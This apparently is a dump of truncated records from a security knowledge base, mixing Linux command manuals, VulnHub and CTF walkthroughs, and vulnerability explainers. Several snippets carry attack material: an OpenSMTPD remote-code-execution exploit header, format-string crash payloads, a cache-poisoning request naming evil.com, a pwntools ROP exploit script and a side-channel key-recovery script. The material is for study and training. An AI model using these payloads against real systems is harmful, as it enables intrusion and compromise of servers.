dig === 域名查询工具 ## 补充说明 **dig命令** 是常用的域名查询工具,可以用来测试域名系统工作是否正常。 ### 语法 ```shell dig(选项)(参数) ``` ### 选项 ```shell @<服务器地址>:指定进行域名解析的域名服务器; -b<ip地址>:当主机具有多个IP地址,指定使用本机的哪个IP地址向域名服务器发送域名查询请求; -f<文件名称>:指定dig以批处理的方式运行,指定的文件中保存着需要批处理查询的DNS任务信息; -P:指定域名服务器所使用端口号; -t<类型>:指定要查询的DNS数据类型; -x<IP地址>:执行逆向域名查询; -4:使用IPv4; -6:使用IPv6; -h...
sec-knowleage
# 解决方案汇总 本篇整理一些态势感知相关的技术框架和相关模型 ### 1. 安全运营+情报 ![](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/20200714143330.png) Fig. 安全运营中威胁情报的应用 ## References [1] 安全运营中威胁情报的应用,姜明元,https://cloud.ssetech.com.cn/p/DUf-3PEQtwcY7gg
sec-knowleage
# SickOs 1.2 下载地址:https://download.vulnhub.com/sickos/sick0s1.2.zip ## 实战操作 扫描靶场IP地址:`192.168.32.148` ![image-20220531102836395](../../.gitbook/assets/image-20220531102836395.png) 扫描端口,发现只开启**22**和**80**端口 ``` ┌──(root💀kali)-[/tmp] └─# nmap -sT -p1-65535 192.168.32.148 ...
sec-knowleage
version: "2" services: jira: image: vulhub/jira:8.1.0 ports: - "8080:8080" links: - smtpd smtpd: build: context: . dockerfile: Dockerfile.smtpd
sec-knowleage
* 本季是《高级持续渗透-第七季demo的成长》的延续。 * https://micropoor.blogspot.com/2019/01/php-demo.html 在第一季关于后门中,文章提到重新编译notepad++,来引入有目标源码后门构造。 在第六季关于后门中,文章**假设在不得知notepad++的源码**,来引入无目标源码沟门构造。 在第七季关于后门中,文章让demo与上几季中对比,更贴近于实战。 而在第八季,继续优化更新demo,强调**后门链**在高级持续渗透中的作用。 **该系列仅做后门思路。** 在上季中引用一个概念:**“安全是一个链安全,攻击引入链攻击,后门引入链后门”**,而**”链”**的本质是...
sec-knowleage
times === 显示进程累计时间。 ## 主要用途 - 打印出shell及其子进程累计使用的用户时间和系统时间。 ## 返回值 总是返回成功。 ## 例子 ```shell # 执行命令 times # 返回结果 0m0.037s 0m0.009s 0m0.010s 0m0.024s # 根据times(2)的man手册,对应关系如下: # 用户时间 | 系统时间 # 子进程的用户时间 | 子进程的系统时间 ``` ### 注意 1. 该命令是bash内建命令,相关的帮助信息请查看`help`命令。
sec-knowleage
# Hadoop Yarn RPC未授权访问漏洞 ## 漏洞简述 Hadoop Yarn作为Hadoop核心组件之一,负责将资源分配至各个集群中运行各种应用程序,并调度不同集群节点上的任务执行。Hadoop Yarn默认对外开放RPC服务,攻击者可利用RPC服务执行任意命令,控制服务器。 同时由于Hadoop Yarn RPC服务访问控制机制开启方式与REST API不一样,因此即使在 REST API有授权认证的情况下,RPC服务所在端口仍然可以未授权访问。 ## 环境搭建 > https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn 需要修改doc...
sec-knowleage
# advanced-potion-making Forensics, 100 points ## Description > Ron just found his own copy of advanced potion making, but its been corrupted by some kind of spell. Help him recover it! A binary file was attached. ## Solution Let's check the file type: ```console ┌──(user@kali)-[/media/sf_CTFs/pico/advanced-potion-mak...
sec-knowleage
# now you don't Forensics, 200 points ## Description: > We heard that there is something hidden in this picture. Can you find it? ![Red](images/nowYouDont.png) ## Solution: Browsing through the different planes using [StegSolve](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve) reveals th...
sec-knowleage
# druid 监控页未授权访问漏洞 ## 漏洞简介 Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问. ## 环境搭建 pom.xml配置 ``` <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ...
sec-knowleage
# My Favorite Color Category: Steganography, 50 points ## Description > My favorite color is transparent, what is yours? A blank image was attached. ## Solution The image provided was blank, however using a tool such as [StegOnline](https://stegonline.georgeom.net/) it was possible to view the flag hidden in one of t...
sec-knowleage
# Djinn3 > https://download.vulnhub.com/djinn/djinn3.tar.gz 靶场IP:`192.168.32.232` 扫描对外端口服务 ``` ┌──(root💀kali)-[/tmp] └─# nmap -p 1-65535 -sV 192.168.32.232 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-11 10:33 EDT Nmap scan...
sec-knowleage
# Web Cache Poisoning ## Introduction The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users. ## Where to find `-` ## How to exploit 1. Basic poisoning ``` GET / HTTP/1.1 Host: www.vuln.com X-Forwarded-Host: evil.com ``` The respon...
sec-knowleage
--- title: 变量的解构赋值 --- ### 数组的解构赋值 ES6 允许按照一定模式,从数组和对象中提取值,对变量进行赋值,这被称为解构(Destructuring)。 ``` let [a, b, c] = [1, 2, 3] ``` 上面代码表示,可以从数组中提取值,按照对应位置,对变量赋值。 **注意**,let数组里的值,可以是数字、变量、对象、函数等、但无法拿到空格占位。 ```js let [a,b,c,d,,] = [1,"aaa",{name:'sayname'},function(){}]; console.log(a,b,c,d); ``` **Rest**参数 - rest参数只包括那些没有给出名称...
sec-knowleage
# Pwndoor - Rev (150 + 0), 5 solves > We found this implant on some of our servers, help us figure it out! In this task, we were given a small binary and host on which it was running. Note that we did not have a port, we had to figure it out ourselves. The binary is rather small. It first creates a raw socket, attaches...
sec-knowleage
speedtest-cli === 命令行下测试服务器外网速度 ## 补充说明 **speedtest-cli** 是一个使用python编写的命令行脚本,通过调用speedtest.net测试上下行的接口来完成速度测试,最后我会测试运维生存时间所在服务器的外网速度。项目地址:https://github.com/sivel/speedtest-cli ### 安装speedtest-cli speedtest-cli需要在python 2.4-3.4的环境下,安装方法都很简单,自己选择以下最适合你的一种。 **pip方式** ```shell # pip install speedtest-cli ``` **easy_i...
sec-knowleage
trap === 捕捉信号和其他事件并执行命令。 ## 概要 ```shell trap [-lp] [[arg] signal_spec ...] ``` ## 主要用途 - 用于指定在接收到信号后将要采取的动作。 - 脚本程序被中断时执行清理工作。 ## 选项 ```shell -l 打印信号名称以及信号名称对应的数字。 -p 显示与每个信号关联的trap命令。 ``` ## 参数 arg:接收到信号时执行的命令。 signal_spec:信号名称或信号名称对应的数字。 ## 返回值 如果表达式执行结果为成功时返回0,当参数 `signal_spec` 没有指定有效值时返回1。 ## 关于信号 信号是一种进程间通信机...
sec-knowleage
## 0x00 json是什么 JSON (JavaScript Object Notation) 是一种轻量级的数据交换格式,易于人阅读和编写,同时也易于机器解析和生成。 JSON 构建基于两种结构: - “名称 值”对的集合 - 值的有序列表 - 结构可以嵌套 - 示例 ``` json {"sites":[ {"name":"Runoob", "url":"www.runoob.com"}, {"name":"Google", "url":"www.google.com"}, {"name":"Taobao", "url":"www.taobao.com"} ]} ``` ## 0x01 fastjs...
sec-knowleage
# Exploit Title: OpenSMTPD 6.6.1 - Remote Code Execution # Date: 2020-01-29 # Exploit Author: 1F98D # Original Author: Qualys Security Advisory # Vendor Homepage: https://www.opensmtpd.org/ # Software Link: https://github.com/OpenSMTPD/OpenSMTPD/releases/tag/6.6.1p1 # Version: OpenSMTPD < 6.6.2 # Tested on: Debian 9.11...
sec-knowleage
### 格式化字符串漏洞利用方式 其实,在上一部分,我们展示了格式化字符串漏洞的两个利用手段 - 使程序崩溃,因为%s对应的参数地址不合法的概率比较大。 - 查看进程内容,根据%d,%f输出了栈上的内容。 ### 格式化字符串漏洞关于程序崩溃 通常来说,利用格式化字符串漏洞使得程序崩溃是最为简单的利用方式,因为我们只需要输入若干个%s即可 ```text %s%s%s%s%s%s%s%s%s%s%s%s%s%s ``` 这是因为栈上不可能每个值都对应了合法的地址,所以总是会有某个地址可以使得程序崩溃。这一利用,虽然攻击者本身似乎并不能控制程序,但是这样却可以造成程序不可用。比如说,如果远程服务有一个格式化字符串漏洞,那么我们就可以攻...
sec-knowleage
# Artisinal Handcrafted HTTP 3 Web Exploitation, 300 points ## Description: > We found a hidden flag server hiding behind a proxy, but the proxy has some... _interesting_ ideas of what qualifies someone to make HTTP requests. Looks like you'll have to do this one by hand. Try connecting via nc 2018shell3.picoctf.com 29...
sec-knowleage
.\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH "SET SESSION AUTHORIZATION" "7" "2003-11-02" "SQL - Language Statements" "SQL Commands" .SH NAME SET SESSION AUTHORIZATION \- 为当前会话设置会话用户标识符和当前用户标识符 .SH SYNOPSIS .sp .nf SET [ SESSION | LOCAL ] SESSION AUTHORIZATION \fIusername\fR SET [ SESSION | LOCAL ] SESSI...
sec-knowleage
import os import subprocess def test_dockerfile_lint(): basedir = os.path.realpath(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..')) dockerfiles = [] for (now_dir, dirs, files) in os.walk(basedir): for name in files: if name in ('oracle-java', ): c...
sec-knowleage
fold === 控制文件内容输出时所占用的屏幕宽度 ## 补充说明 **fold命令** 用于控制文件内容输出时所占用的屏幕宽度。fold命令会从指定的文件里读取内容,将超过限定列宽的列加入增列字符后,输出到标准输出设备。若不指定任何文件名称,或是所给予的文件名为“-”,则fold指令会从标准输入设备读取数据。 ### 语法 ```shell fold(选项)(参数) ``` ### 选项 ```shell -b或——bytes:以Byte为单位计算列宽,而非采用行数编号为单位; -s或——spaces:以空格字符作为换列点; -w<每列行数>或--width<每列行数>:设置每列的最大行数。 ``` ### 参数 文件:指...
sec-knowleage
package org.vulhub.api; public interface CalcService { Integer add(Integer a, Integer b); Integer minus(Integer a, Integer b); }
sec-knowleage
# caas Web, 150 points ## Description > Now presenting cowsay as a service A Javascript file was attached: ```javascript const express = require('express'); const app = express(); const { exec } = require('child_process'); app.use(express.static('public')); app.get('/cowsay/:message', (req, res) => { exec(`/usr/games...
sec-knowleage
--- title: intrace categories: Information Gathering tags: [information gathering,kali linux,intrace,evasion,recon] date: 2017-04-23 08:54:45 --- 0x00 介绍 ------- InTrace是一款类似于Traceroute的被动路由跟踪工具。但它不同的是,他不主动发送数据包,而是通过监听当前主机和目标主机的数据包,进行分析,从而获取路由信息。这样既可以进行网络侦查,又可以绕过防火墙的限制,避免被防火墙发现。工具使用非常简单,只要开启监听,然后等待获取和目标主机的数据包,然后就可以获取路由...
sec-knowleage
from pwn import * #r = process("./rescue")#, env={"LD_PRELOAD":"./libc.so.6"}) fread = 0x0000000000076eb0 #system = 0x0000000000047dc0 gadget = 0x47c9a #gadget = 0xd9763 r = remote("rescueshell.challs.malice.fr", 6060) fread = 0x000000000006a460 gadget = 0x41374 RDI = 0x0000000000400a93 # pop rdi ; ret RBP = 0x000000...
sec-knowleage
from library import * from lib_attack import * import sys import numpy as np inputs, outputs, traces_orig = parse(sys.argv[1]) j = 0 flag = [0] * 16 for place in range(7620, 32500, 1626): traces = np.copy(traces_orig[:, place-400:place+400]) normalize(traces) align(traces, range(-50, 50)) traces = tr...
sec-knowleage